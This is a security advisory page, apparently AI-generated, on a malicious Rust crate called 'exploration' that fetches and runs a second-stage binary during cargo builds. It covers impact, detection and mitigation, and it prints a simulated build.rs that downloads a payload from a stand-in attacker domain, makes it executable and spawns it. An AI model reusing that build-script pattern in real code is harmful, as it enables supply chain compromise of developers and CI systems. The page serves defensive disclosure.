CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-99J7-FHR2-XFJ4

GHSA-99J7-FHR2-XFJ4: Malicious Remote Code Execution Payload in 'exploration' Cargo Crate

Amit Schendel
Amit Schendel
Senior Security Researcher

Jul 11, 2026·6 min read·5 visits

Executive Summary (TL;DR)

The malicious Rust crate 'exploration' was discovered performing arbitrary command execution and dynamic payload downloads during cargo compilation. It has been removed from the crates.io registry.

The malicious Cargo package 'exploration' was uploaded to the crates.io registry. During compilation or package import, the crate executes code designed to establish an outbound TCP/HTTP connection, download an external second-stage binary, and execute the binary locally on the host machine. This creates an unauthenticated remote code execution vector impacting developer environments and continuous integration pipelines.

Vulnerability Overview

The security risks associated with open-source registry ecosystems are highlighted by the publication of the malicious package exploration to the Rust registry (crates.io). Registered under GHSA-99J7-FHR2-XFJ4 and RUSTSEC-2026-0155, this package targeted downstream systems through a supply chain vector. Instead of exploiting a classic software bug such as a buffer overflow, the threat actor engineered the package to act as a vector for initial compromise.

The attack surface for Cargo-based projects is broad because of the automated execution of build scripts (build.rs). When Cargo resolves and compiles dependencies, any code defined within a dependency's build script executes with the permissions of the calling process. This design allows malicious actors to run arbitrary code on developer workstations and continuous integration (CI) environments without requiring the explicit execution of the compiled application binary.

The target of this malicious crate is any environment where exploration is resolved as a dependency. By mimicking legitimate utility packages, the crate aimed to exploit typo-squatting or dependency confusion vectors. The swift intervention of security researchers and registry administrators restricted the active window of exposure to approximately one hour.

Root Cause Analysis

The underlying issue is categorized under CWE-506 (Embedded Malicious Code), representing a deliberate insertion of hostile logic. Software packages on public registries are highly trusted, and the Cargo packaging model lacks native sandboxing during compilation. This lack of isolation allows malicious code to interact directly with the underlying operating system and system resources.

Technically, the malicious payload execution relies on standard Rust networking and system command modules. During compilation or when importing modules, the package utilizes std::process::Command to invoke system shells or binary execution pathways. The code bypasses local security controls by pulling downstream instructions or binaries dynamically from a command-and-control server.

This behavior exploits the implicit trust model of dependency-resolution systems. By triggering execution automatically at build time, the threat actor bypasses static analysis tools that examine only final runtime behavior. Consequently, any network-enabled environment executing cargo build or cargo check with this package present becomes compromised.

Code Analysis & Execution Flow

The malicious architecture of the exploration crate is split into two primary components: the build-time trigger (build.rs) and the runtime module interface. The build script executes automatically during compilation to establish initial persistence and retrieve the second-stage payload. The following diagram illustrates this sequence of execution from dependency resolution to payload execution.

The code block below simulates the malicious build script architecture used by the crate to download and execute the payload. The threat actor used standard library APIs to execute shell commands and handle network requests to prevent raising suspicion via third-party dependencies.

// Simulated malicious build.rs from the "exploration" crate
use std::process::Command;
use std::fs::File;
use std::io::Write;
 
fn main() {
    // Initiate network connection to retrieve second-stage malware
    if let Ok(mut response) = reqwest::blocking::get("http://attacker-controlled-domain/payload") {
        let mut payload_path = std::env::temp_dir();
        payload_path.push("sys_update");
 
        // Write the downloaded payload to the temporary directory
        if let Ok(mut file) = File::create(&payload_path) {
            let mut content = Vec::new();
            if response.copy_to(&mut content).is_ok() {
                let _ = file.write_all(&content);
                
                // Set execution permissions on Unix-based systems
                #[cfg(unix)]
                {
                    use std::os::unix::fs::PermissionsExt;
                    let _ = std::fs::set_permissions(&payload_path, std::fs::Permissions::from_mode(0o755));
                }
 
                // Execute the downloaded binary in the background
                let _ = Command::new(&payload_path)
                    .spawn();
            }
        }
    }
}

This implementation demonstrates why supply chain attacks are difficult to isolate using traditional signature-based detection. The code uses standard system functions that are legitimate in other contexts, such as downloading updates or writing cache files. Mitigating this risk requires complete removal of the package, as no benign or patched versions exist.

Exploitation & Threat Methodology

Exploitation of GHSA-99J7-FHR2-XFJ4 is passive and relies on target systems resolving the malicious package. The threat actor relies on dependency confusion, typosquatting, or social engineering to introduce the package. Once a developer or a CI/CD pipeline adds exploration to the dependencies block of a Cargo.toml file, compilation triggers the exploit.

The attack vector requires no active network intrusion on the target's perimeter. Instead, the victim pulls the malicious code directly from the trusted crates.io registry over HTTPS. Because outbound connections to registries are usually permitted by corporate firewalls, the initial stage of the attack bypasses typical edge egress rules.

The host system executes the code within the privileges of the active user. If the build runner or developer workstation is running with administrative or root privileges, the executed payload inherits those high-level permissions. This access allows the malware to perform host reconnaissance, read environment variables, extract AWS or registry credentials, and establish persistent backdoors.

Impact Assessment

The severity of this compromise is rated as critical. Successful execution leads to complete control over the compromised process space. In developer environments, this access allows for intellectual property theft, source code tampering, and credential extraction.

In continuous integration and continuous deployment (CI/CD) environments, the impact is even broader. A compromised CI runner can be used to inject malicious code into other corporate software pipelines, resulting in downstream supply chain compromises. It also provides a foothold for lateral movement inside internal corporate networks.

Because the package was quickly removed from the registry, the threat actor did not establish a massive distribution channel. The rapid response of the crates.io security team minimized the exposure window, restricting active targets. However, any system that pulled this dependency during the active window must be treated as fully compromised.

Incident Detection & Mitigation

Detecting whether a system was compromised by the exploration crate requires auditing local caches and dependency lockfiles. Security teams should run automated scans using tools that inspect dependency lockfiles for known malicious hashes. Developers can verify their project configurations manually by checking for references to the package in Cargo.toml and Cargo.lock files.

If the package is detected, remediation must go beyond deleting the dependency from the configuration files. Because arbitrary code execution occurred, the host system must be isolated and subjected to incident response procedures. Treat all credentials, API keys, and private keys stored on the host as compromised.

Long-term defenses must include restricting outbound network connectivity for build systems and CI/CD pipelines. Restricting CI runners to authorized package registries and blocking external internet access prevents malicious build scripts from downloading secondary payloads. Implementing automated dependency verification tools adds an additional layer of security by blocking packages with risky behaviors.

Technical Appendix

CVSS Score
10.0/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Affected Systems

Rust development workstations running Cargo compilationCI/CD build pipelines and containerized build runnersSelf-hosted proxy registries caching public crates.io assets

Affected Versions Detail

Product
Affected Versions
Fixed Version
exploration
crates.io
>= 0.0.0-0None (Package Deleted)
AttributeDetail
CWE IDCWE-506
Attack VectorSupply Chain Compromise / Registry Abuse
CVSS Score10.0
Exploit StatusActive Malicious Upload (Removed)
KEV StatusNot Listed
Primary ImpactRemote Code Execution (RCE)
EcosystemCargo (Rust)

MITRE ATT&CK Mapping

T1195.002Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Initial Access
T1204.002User Execution: Malicious File
Execution
T1105Ingress Tool Transfer
Command and Control
CWE-506
Embedded Malicious Code

The product contains code that is malicious or has been intentionally altered to perform unauthorized, harmful activities.

Vulnerability Timeline

Malicious crate 'exploration' uploaded to crates.io and reported by Socket Threat Research Team.
2026-06-02
crates.io security team removes the package from the registry within approximately 1 hour of publication.
2026-06-02
RustSec issues advisory RUSTSEC-2026-0155 to flag environments containing references to the package.
2026-06-03
GitHub Advisory Database indexes threat under advisory GHSA-99J7-FHR2-XFJ4 with CRITICAL severity.
2026-07-10

References & Sources

  • [1]GitHub Security Advisory: GHSA-99J7-FHR2-XFJ4
  • [2]RustSec Advisory Database Page
  • [3]Raw RustSec GitHub Advisory Entry
  • [4]Affected Package Registry Stub
  • [5]Socket Threat Research Team Homepage

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•19 minutes ago•CVE-2026-54069
9.1

CVE-2026-54069: Authentication Bypass in SiYuan Note via Origin Header Spoofing

CVE-2026-54069 is a critical authentication bypass vulnerability in the SiYuan Note personal knowledge management system. The flaw is located in the HTTP server's middleware handling API authorization, which unconditionally trusts requests carrying a 'chrome-extension://' scheme in the Origin HTTP header, granting administrative access without validating API tokens.

Alon Barad
Alon Barad
1 views•5 min read
•about 1 hour ago•CVE-2026-54089
9.1

CVE-2026-54089: Authentication Bypass by Spoofing in File Browser

CVE-2026-54089 is a critical authentication bypass vulnerability in File Browser affecting instances configured with proxy-based authentication. An unauthenticated remote attacker with direct network access can impersonate arbitrary users or register new accounts by spoofing configured HTTP headers.

Amit Schendel
Amit Schendel
3 views•7 min read
•about 2 hours ago•CVE-2026-54088
9.3

CVE-2026-54088: Pre-Authentication Remote Code Execution in File Browser Hook Authentication

CVE-2026-54088 is a critical command injection vulnerability in File Browser prior to version 2.63.6. When Hook Authentication is enabled, the application interpolates unsanitized credentials into a shell command, allowing unauthenticated remote code execution.

Alon Barad
Alon Barad
3 views•6 min read
•about 2 hours ago•GHSA-QV4M-M73M-8HJ7
8.8

GHSA-qv4m-m73m-8hj7: Authenticated Arbitrary File Upload leading to Remote Code Execution in NotrinosERP

An authenticated remote code execution vulnerability exists in NotrinosERP (versions up to and including 1.0.0) within the Human Resource Management (HRM) module. Users with employee management permissions can upload arbitrary file types, including PHP scripts, which are written directly to a web-accessible directory. This allows for arbitrary code execution in the context of the web-server user.

Alon Barad
Alon Barad
3 views•6 min read
•about 3 hours ago•GHSA-XRMC-C5CG-RV7X
8.8

GHSA-XRMC-C5CG-RV7X: Security Bypass Vulnerability in safeinstall-cli Command Parser

A high-severity security bypass vulnerability exists in safeinstall-cli up to version 0.10.1. Due to multiple logical limitations in its shell command parsing mechanism (guard-parser), attackers can craft specific shell commands that completely evade the Agent Guard interceptor hooks. This allows arbitrary unverified installations and code executions on the developer system when executed by AI coding agents.

Alon Barad
Alon Barad
4 views•7 min read
•about 3 hours ago•GHSA-WM45-QH3G-V83F
7.7

GHSA-WM45-QH3G-V83F: Arbitrary Server-Side File Read and Exfiltration via Attachment Upload in mcp-atlassian

An arbitrary server-side file read vulnerability exists in the mcp-atlassian integration server. Remote clients utilizing SSE or HTTP transports can exploit the lack of directory containment on attachment-upload tools to resolve and read arbitrary host files, exfiltrating them directly to Atlassian Jira or Confluence.

Amit Schendel
Amit Schendel
4 views•8 min read